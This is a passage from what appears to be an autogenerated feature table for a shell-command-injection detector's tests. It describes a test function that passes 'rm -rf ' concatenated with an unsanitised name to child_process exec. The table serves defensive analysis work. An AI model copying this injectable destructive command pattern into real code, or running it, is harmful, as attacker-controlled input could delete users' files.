name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:3 | cp | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:8 | cp.exec | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | cp.exec ... + name) | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:5:27:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:5:27:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:5:27:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:5:27:8 | exec | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:5:27:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:18 | "rm -rf " | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:10:27:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:22:27:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:22:27:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:22:27:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:22:27:25 | name | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:22:27:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:22:27:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:18 | module.exports.bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:18 | module.exports.bla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:18 | module.exports.bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:31 | module. ... cla2() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:31 | module. ... cla2() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:1:29:31 | module. ... cla2() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:8:29:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:8:29:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:8:29:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:16:29:18 | bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:16:29:18 | bla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:16:29:18 | bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:22:29:31 | exceptional return of new cla2() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:22:29:31 | exceptional return of new cla2() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:22:29:31 | exceptional 